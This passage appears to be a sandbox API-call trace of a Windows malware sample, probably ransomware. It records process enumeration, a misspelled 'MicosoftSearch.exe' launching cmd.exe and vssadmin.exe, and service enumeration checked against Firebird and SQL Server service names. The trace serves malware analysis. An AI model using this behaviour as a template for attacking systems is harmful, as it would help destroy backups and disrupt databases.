th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0046.431] lstrlenW (lpString="winlogon.exe") returned 12 [0046.431] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0046.432] lstrlenW (lpString="services.exe") returned 12 [0046.432] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0046.432] lstrlenW (lpString="lsass.exe") returned 9 [0046.432] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0046.433] lstrlenW (lpString="lsm.exe") returned 7 [0046.433] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.434] lstrlenW (lpString="svchost.exe") returned 11 [0046.434] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.435] lstrlenW (lpString="svchost.exe") returned 11 [0046.435] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.436] lstrlenW (lpString="svchost.exe") returned 11 [0046.436] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.436] lstrlenW (lpString="svchost.exe") returned 11 [0046.437] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.437] lstrlenW (lpString="svchost.exe") returned 11 [0046.437] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0046.438] lstrlenW (lpString="audiodg.exe") returned 11 [0046.438] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.439] lstrlenW (lpString="svchost.exe") returned 11 [0046.439] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.440] lstrlenW (lpString="svchost.exe") returned 11 [0046.440] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0046.440] lstrlenW (lpString="dwm.exe") returned 7 [0046.440] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0046.441] lstrlenW (lpString="explorer.exe") returned 12 [0046.441] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0046.442] lstrlenW (lpString="spoolsv.exe") returned 11 [0046.442] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.443] lstrlenW (lpString="taskhost.exe") returned 12 [0046.443] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.443] lstrlenW (lpString="svchost.exe") returned 11 [0046.443] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0046.444] lstrlenW (lpString="taskeng.exe") returned 11 [0046.444] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.445] lstrlenW (lpString="taskhost.exe") returned 12 [0046.445] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0046.446] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0046.446] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0046.446] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0046.446] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0046.447] lstrlenW (lpString="sa_shape.exe") returned 12 [0046.447] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0046.448] lstrlenW (lpString="confidence.exe") returned 14 [0046.448] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0046.544] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0046.545] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0046.545] lstrlenW (lpString="blue.exe") returned 8 [0046.546] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0046.546] lstrlenW (lpString="newly debut.exe") returned 15 [0046.546] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0046.547] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0046.547] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0046.548] lstrlenW (lpString="archive.exe") returned 11 [0046.548] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0046.549] lstrlenW (lpString="defend.exe") returned 10 [0046.549] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0046.549] lstrlenW (lpString="arservice.exe") returned 13 [0046.550] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0046.550] lstrlenW (lpString="rr-programmer.exe") returned 17 [0046.550] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0046.551] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0046.551] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0046.552] lstrlenW (lpString="twistedmonton.exe") returned 17 [0046.552] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0046.553] lstrlenW (lpString="arc plains.exe") returned 14 [0046.553] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0046.554] lstrlenW (lpString="americahousestip.exe") returned 20 [0046.554] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0046.554] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0046.554] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0046.555] lstrlenW (lpString="medical lectures.exe") returned 20 [0046.555] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0046.556] lstrlenW (lpString="electronic.exe") returned 14 [0046.556] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0046.557] lstrlenW (lpString="regression.exe") returned 14 [0046.557] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0046.558] lstrlenW (lpString="county.exe") returned 10 [0046.558] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0046.558] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0046.558] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0046.559] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0046.559] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.560] lstrlenW (lpString="cmd.exe") returned 7 [0046.560] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.561] lstrlenW (lpString="conhost.exe") returned 11 [0046.561] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0046.561] lstrlenW (lpString="vssadmin.exe") returned 12 [0046.561] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0046.562] lstrlenW (lpString="VSSVC.exe") returned 9 [0046.562] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.563] lstrlenW (lpString="svchost.exe") returned 11 [0046.563] Process32NextW (in: hSnapshot=0x1b4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0046.564] CloseHandle (hObject=0x1b4) returned 1 [0046.564] Sleep (dwMilliseconds=0x1f4) [0047.306] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb90248 [0047.316] EnumServicesStatusExW (in: hSCManager=0xb90248, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0047.324] GetLastError () returned 0xea [0047.324] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0047.333] EnumServicesStatusExW (in: hSCManager=0xb90248, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0047.333] CloseServiceHandle (hSCObject=0xb90248) returned 1 [0047.334] lstrlenW (lpString="Appinfo") returned 7 [0047.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0047.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0047.334] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0047.334] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0047.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0047.334] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0047.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.334] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0047.334] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0047.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0047.334] lstrlenW (lpString="AudioSrv") returned 8 [0047.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0047.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0047.334] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0047.334] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0047.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0047.334] lstrlenW (lpString="BFE") returned 3 [0047.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0047.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0047.334] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0047.334] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0047.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0047.334] lstrlenW (lpString="CryptSvc") returned 8 [0047.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0047.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0047.334] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0047.334] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0047.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0047.334] lstrlenW (lpString="CscService") returned 10 [0047.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0047.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0047.335] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0047.335] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0047.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0047.335] lstrlenW (lpString="DcomLaunch") returned 10 [0047.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.335] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0047.335] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0047.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0047.335] lstrlenW (lpString="Dhcp") returned 4 [0047.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0047.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0047.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0047.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0047.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0047.335] lstrlenW (lpString="Dnscache") returned 8 [0047.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0047.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0047.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0047.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0047.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0047.335] lstrlenW (lpString="DPS") returned 3 [0047.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0047.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0047.335] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0047.335] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0047.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0047.335] lstrlenW (lpString="eventlog") returned 8 [0047.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0047.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0047.335] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0047.335] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0047.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0047.335] lstrlenW (lpString="EventSystem") returned 11 [0047.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0047.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0047.336] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0047.336] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0047.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0047.336] lstrlenW (lpString="gpsvc") returned 5 [0047.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0047.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0047.336] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0047.336] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0047.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0047.336] lstrlenW (lpString="iphlpsvc") returned 8 [0047.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.336] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0047.336] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0047.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0047.336] lstrlenW (lpString="LanmanServer") returned 12 [0047.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0047.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0047.336] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0047.336] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0047.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0047.336] lstrlenW (lpString="LanmanWorkstation") returned 17 [0047.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.336] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0047.336] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0047.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0047.336] lstrlenW (lpString="lmhosts") returned 7 [0047.336] lstrcmpiW 